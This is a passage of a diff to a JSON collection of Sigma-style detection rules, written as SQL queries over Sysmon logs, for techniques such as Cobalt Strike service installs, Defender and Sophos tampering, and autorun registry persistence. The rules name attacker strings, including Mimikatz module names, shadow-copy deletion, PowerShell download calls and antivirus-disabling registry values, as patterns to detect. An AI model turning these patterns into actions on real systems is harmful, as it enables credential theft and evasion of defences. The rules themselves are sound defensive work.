'\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\')) AND NOT ((Details LIKE '(Empty)' ESCAPE '\\' OR Details LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_webclient_casing.yml" + "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" }, { - "title": "Suspicious SYSTEM User Process Creation", - "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", + "title": "CobaltStrike Service Installations in Registry", + "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", "status": "test", - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "author": "Wojciech Lesicki", + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ], "falsepositives": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (Image LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((Details LIKE '%ADMIN$%' ESCAPE '\\' AND Details LIKE '%.exe%' ESCAPE '\\') OR (Details LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND Details LIKE '%start%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_system_user_anomaly.yml" + "filename": "registry_set_cobaltstrike_service_installs.yml" }, { - "title": "LockerGoga Ransomware Activity", - "id": "74db3488-fd28-480a-95aa-b7af626de068", - "status": "stable", - "description": "Detects LockerGoga ransomware activity via specific command line.", - "author": "Vasiliy Burov, oscd.community", + "title": "Tamper With Sophos AV Registry Keys", + "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", + "status": "experimental", + "description": "Detects tamper attempts to sophos av functionality via registry key modification", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" + "filename": "registry_set_sophos_av_tamper.yml" }, { - "title": "Xwizard DLL Sideloading", - "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "title": "Disable Administrative Share Creation at Startup", + "id": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", "status": "test", - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "author": "Christian Burkard (Nextron Systems)", + "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1070.005" ], "falsepositives": [ - "Windows installed on non-C drive" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%AutoShareWks' ESCAPE '\\' OR TargetObject LIKE '%AutoShareServer' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" + "filename": "registry_set_disable_administrative_share.yml" }, { - "title": "Suspicious Add Scheduled Task Parent", - "id": "9494479d-d994-40bf-a8b1-eea890237021", - "status": "experimental", - "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", - "author": "Florian Roth (Nextron Systems)", + "title": "Internet Explorer Autorun Keys Modification", + "id": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%unattended.ini%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Toolbar%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer Bars%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((TargetObject LIKE '%\\\\Extensions\\\\{2670000A-7350-4f3c-8081-5663EE0C6C49}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Toolbar\\\\ShellBrowser\\\\ITBar7Layout' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\ShowDiscussionButton' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\Locked' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_schtasks_parent.yml" + "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml" }, { - "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", - "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "title": "Potential Persistence Via AutodialDLL", + "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "status": "experimental", - "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", - "author": "frack113", + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" + "filename": "registry_set_persistence_autodial_dll.yml" }, { - "title": "CreateDump Process Dump", - "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", + "title": "Disable Windows Defender Functionalities Via Registry Keys", + "id": "0eb46774-f1ab-4a74-8238-1155855f2263", "status": "experimental", - "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1562.001" ], "falsepositives": [ - "Command lines that use the same flags" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" ], - "filename": "proc_creation_win_lolbin_createdump.yml" + "filename": "registry_set_windows_defender_tamper.yml" }, { - "title": "Kavremover Dropped Binary LOLBIN Usage", - "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", + "title": "Potential Attachment Manager Settings Associations Tamper", + "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", "status": "experimental", - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND Details = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (Details LIKE '%.zip;%' ESCAPE '\\' OR Details LIKE '%.rar;%' ESCAPE '\\' OR Details LIKE '%.exe;%' ESCAPE '\\' OR Details LIKE '%.bat;%' ESCAPE '\\' OR Details LIKE '%.com;%' ESCAPE '\\' OR Details LIKE '%.cmd;%' ESCAPE '\\' OR Details LIKE '%.reg;%' ESCAPE '\\' OR Details LIKE '%.msi;%' ESCAPE '\\' OR Details LIKE '%.htm;%' ESCAPE '\\' OR Details LIKE '%.html;%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_kavremover.yml" + "filename": "registry_set_policies_associations_tamper.yml" }, { - "title": "Execute Code with Pester.bat", - "id": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", - "status": "test", - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "author": "Julia Fomina, oscd.community", + "title": "Winlogon AllowMultipleTSSessions Enable", + "id": "f7997770-92c3-4ec9-b112-774c4ef96f96", + "status": "experimental", + "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", + "attack.persistence", "attack.defense_evasion", - "attack.t1216" + "attack.t1112" ], "falsepositives": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" + "Legitimate use of the multi session functionality" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Pester%' ESCAPE '\\' AND CommandLine LIKE '%Get-Help%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%pester%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\' AND (CommandLine LIKE '%help%' ESCAPE '\\' OR CommandLine LIKE '%_%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AllowMultipleTSSessions' ESCAPE '\\' AND Details LIKE '%DWORD (0x00000001)' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pester_1.yml" + "filename": "registry_set_winlogon_allow_multiple_tssessions.yml" }, { - "title": "PUA - Wsudo Suspicious Execution", - "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "title": "Custom File Open Handler Executes PowerShell", + "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "status": "experimental", - "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the abuse of custom file open handler, executing powershell", + "author": "CD_R0M_", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1059" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentImage LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\' AND Details LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" }, { - "title": "HackTool - SharpView Execution", - "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "title": "Wow6432Node Classes Autorun Keys Modification", + "id": "18f2065c-d36c-464a-a748-bcf909acb2e3", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "falsepositives": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" + ], + "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml" + }, + { + "title": "Registry Persitence via Service in Safe Mode", + "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "description": "Detects the modification of the registry to 